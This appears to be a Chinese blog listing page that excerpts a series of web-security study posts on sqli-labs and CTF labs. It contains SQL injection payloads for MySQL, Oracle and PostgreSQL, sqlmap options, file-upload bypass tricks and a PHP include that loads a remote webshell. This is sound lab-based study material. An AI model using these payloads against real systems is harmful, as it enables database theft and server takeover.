
网络安全
文章平均质量分 50
新奇八
这个作者很懒,什么都没留下…
展开
-
sqli-labs靶场Page1【持续更新】
id=-1") union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()–+ //在这块儿你会得到几个一些表,比如【Your Password:emails,referers,uagents,users】 可以查一下这些相关的资料。id=-1")union select 1,2,3–+ //位于2,3字段。前面几关弄完了会重新补充。原创 2023-04-29 16:00:20 · 223 阅读 · 0 评论 -
sqli-labs靶场Page1【持续更新】
id=-1") union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()–+ //在这块儿你会得到几个一些表,比如【Your Password:emails,referers,uagents,users】 可以查一下这些相关的资料。id=-1")union select 1,2,3–+ //位于2,3字段。前面几关弄完了会重新补充。原创 2023-02-06 22:25:53 · 149 阅读 · 0 评论 -
第三十五天:XSS跨站&反射&存储&DOM&盲打&劫持
指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。通过在用户端注入恶意的可执行脚本,若服务器对用户的输入不进行处理或处理不严,则浏览器就会直接执行用户注入的脚本。窃取用户cookies资料,从而获取用户隐私信息,或利用用户身份对网站执行操作;劫持用户(浏览器)会话,从而执行任意操作,例如非法转账、发表日志、邮件等;XSS跨站-攻击项目&XSS平台&Beef-XSS。原创 2023-02-05 19:21:32 · 466 阅读 · 0 评论 -
第三十四天:文件上传&黑白盒审计&逻辑&中间件&外部引用
如果要图片后缀解析脚本代码,一般会利用包含漏洞或解析漏洞,还有.user.ini&.htaccess。后门代码需要用特定格式后缀解析,不能以图片后缀解析脚本后门代码(解析漏洞除外)如:jpg图片里面有php后门代码,不能被触发,所以连接不上后门。4、绕过技巧:多后缀解析,截断,中间件特性,条件竞争等。3、检测后缀:黑名单,白名单,MIME检测等。2、检测内容:文件头,完整性,二次渲染等。3、文件上传-实例CMS文件上传安全分析。2、文件上传-中间件解析&编辑器安全。1、检测层面:前端,后端等。原创 2023-02-05 16:32:11 · 227 阅读 · 0 评论 -
第三十三天:文件上传&中间件解析漏洞&编辑器安全
Apache HTTP Server(简称Apache)是Apache软件基金会的一个开放源码的网页服务器,可以在大多数计算机操作系统中运行,由于其多平台和安全性被广泛使用,是最流行的Web服务器端软件之一。先判断中间件,是否有解析漏洞,字典扫描拿到上传点,或者会员中心,有可能存在文件上传的地方,而后测试绕过/验证,根据实际情况判断是白名单、黑名单还是内容其他的绕过,绕过/验证和中间件的解析漏洞也不行的话就看看CMS是否存在漏洞,然后看看编辑器漏洞有无以及其他漏洞如CVE漏洞。各个平台解析漏洞讲解。原创 2023-02-05 16:31:14 · 387 阅读 · 0 评论 -
第三十二天:文件上传&二次渲染&.htaccess&变异免杀
include’http://794750069/'> //这里的http://794750069/是一个包含一句话木马的网页。原文链接:https://blog.youkuaiyun.com/hesysd/article/details/127979999。如果要图片后缀解析脚本代码,一般会利用包含漏洞或解析漏洞,还有.user.ini&.htaccess。1.直接全部都删除,这种就只能通过条件竞争(即通过快速访问文件,让文件的进程被占用,导致无法删除)4、绕过技巧:多后缀解析,截断,中间件特性,条件竞争等。原创 2023-02-05 16:30:17 · 274 阅读 · 0 评论 -
第三十一天:无解
后门代码需要用特定格式后缀解析,不能以图片后缀解析脚本后门代码(解析漏洞除外)如:jpg图片里面有php后门代码,不能被触发,所以连接不上后门。在前端对代码进行了验证,这时候就需要修改前端验证即可。152-JS验证+MIME。CTFshow 靶场实战。加入了MIME的验证。原创 2023-02-05 16:24:18 · 114 阅读 · 0 评论 -
第三十天:WEB攻防-通用漏洞&SQL注入&CTF&二次&堆叠&DNS带外
SQL注入中的二次注入常见于 注册 新建 等功能点,当我们注册一个新的账号时,需要我们设置我们的 邮箱,用户名,密码。但是当我们成功注册后,登录只需要邮箱与密码即可完成登录,且进入后台用户中心后,我们也可以发现我们的用户名会被显示出来,这就是SQL注入的常见出现流程我们在注册新的账号时,如果使用了 ‘’ “” 等符号 ,会被转义。所以我们常使用的sql注入payload 都会失去效果,但是当该payload被存入数据库在被引出使用的时候是原样输出,不会被过滤转义。这就是二次注入的原理了。原创 2023-02-04 17:52:13 · 440 阅读 · 0 评论 -
第二十九天:WEB攻防-通用漏洞&SQL注入&增删改查&盲注&延时&布尔&报错
就是在注入过程中,获取的数据不能回显至前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。解决:常规的联合查询注入不行的情况。原创 2023-02-03 13:51:46 · 320 阅读 · 0 评论 -
第二十八天:WEB攻防-通用漏洞&SQL注入&HTTP头XFF&COOKIE&POST请求
提交方式注入 - get post cookie http头等出现不同提交方式的原因:数据大小,类型,功能SQL注入的原理是在于 源码与数据库交互的时候未对用户输入的数据进行过滤,所以我们常规的可见的注入点往往就是在url上 例如 :http://127.0.0.1/index.php?id=1 的id参数处存在sql注入。常见payload http://127.0.0.1/index.php?但是我们往往还有其他的注入点容易被忽略不同接收方式产生的注入。原创 2023-02-02 23:38:55 · 409 阅读 · 0 评论 -
第二十七天:WEB攻防-通用漏洞&SQL注入&Tamper脚本&Base64&Json&md5等
1.数据库注入 - access mysql mssql oracle mongodb postgresql等。原创 2023-02-01 22:57:04 · 228 阅读 · 0 评论 -
第二十六天:WEB攻防-通用漏洞&SQL注入&Sqlmap&Oracle&Mongodb&DB2等
爆其他列名:and 1=2 union select ‘1’,(select column_name from all_tab_columns where rownum=1 and table_name=‘sns_users’ and column_name not in (‘USER_NAME’)) from dual。-p “user-agent” --user-agent “sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)” #指定user-agent注入。原创 2023-02-01 15:39:02 · 316 阅读 · 0 评论 -
练习:SQL注入——PostgreSQL
不同于mysql数据库的union select 1,2,3,4,该i数据库的使用null来替代,union select null,null,null,null,在中间输入之后同样使用and1=2来进行报错即使and 1=2 union select null,null,null,null。and 1=2 union select ‘null’,null,null,null 错误。and 1=2 union select null,null,null,‘null’ 错误。依次序使其测出显位。原创 2023-02-01 14:14:37 · 2005 阅读 · 2 评论 -
第二十五天:WEB攻防-通用漏洞&SQL读写注入&MYSQL&MSSQL&PostgreSQL
分为盘符绝对路径和网址绝对路径盘符绝对路径:顾名思义如图:网址绝对路径:网址的路径,如下图-路径获取:phpinfo,报错,字典等-无法写入:secure_file_priv突破 注入中需要支持SQL执行环境,没有就需要借助phpmyadmin或能够直接连上对方数据库进行绕过set global slow_query_log_file=‘shell路径’;select '原创 2023-01-31 17:17:24 · 689 阅读 · 0 评论 -
第二十四天:WEB攻防-通用漏洞&SQL注入&MYSQL跨库&ACCESS偏移
脚本代码在实现代码与数据库进行数据通讯时(从数据库取出相关数据进行页面显示),将定义的SQL语句进行执行查询数据时。其中的SQL语句能通过参数传递自定义值来实现控制SQL语句,从而执行恶意的SQL语句,可以实现查询其他数据(数据库中的敏感数据,如管理员帐号密码)。这一个过程就可以叫做SQL注入漏洞。原创 2023-01-23 19:39:44 · 628 阅读 · 0 评论 -
第二十三天:WEB攻防-WEB攻防-Python考点&CTF与CMS-SSTI模版注入&PYC反编译
pyc文件是py文件编译后生成的字节码文件(byte code)。pyc文件经过python解释器最终会生成机器码运行。所以pyc文件是可以跨平台部署的,类似Java的.class文件。一般py文件改变后,都会重新生成pyc文件。当然,生成的pyc文件也是可以通过网上一些在线平台反编译出来从而获得源码的反编译平台:1.https://tool.lu/pyc/ 2.http://tools.bugscaner.com/decompyle/但是实战环境下,一般也获取不到pyc文件,所以就没有更多的细节了。原创 2023-01-18 14:19:13 · 271 阅读 · 0 评论 -
第二天:基础入门-Web应用&架构搭建&漏洞&HTTP数据包&代理服务器
通过这个接口我们就能实现对计算机的控制,比如我们常见的 ssh 就是执行的 Shell 命令实现对远程对服务器的控制。在这种模式 下,shell不与你进行交互,如果用反向 Shell,那就是在 A 上先开启一个监听端口,然后让 B 去连接 A 的这个端口,容器:容器是中间件的一种,处在操作系统和应用软件之间,给处于其中的应用程序组件提供一个环境,我们都知道 Shell 的概念吧,简单来说,Shell 就是实现用户命令的接口,交互式模式就是在终端上执行,shell等待你的输入,并且立即执行你提交的命令。原创 2022-11-23 21:45:53 · 699 阅读 · 0 评论 -
第一天:基础入门-操作系统&名词&文件下载&反弹SHELL&防火墙绕过
反弹:反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发器请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷,从而可以使攻击者能够在未授权的情况下访问或破坏系统。Payload:中文"有效载荷",指成功exploit之后,真正在目标系统执行的代码或指令(漏洞利用成功后的形式,或者说通道)。原创 2022-11-23 00:00:44 · 672 阅读 · 1 评论 -
第二十天:WEB攻防-PHP特性&缺陷对比函数&CTF考点&CMS审计实例
= 表示属于弱类型判断 不判断类型可以通过MD5的值来进行绕过而对于===可通过数组来进行绕过我写的,不知哪儿出错,但意思我明白//name[]=1&password[]=2 // === 无法判断数组 所以name[] 和password[] 都是null。原创 2023-01-11 17:05:33 · 293 阅读 · 1 评论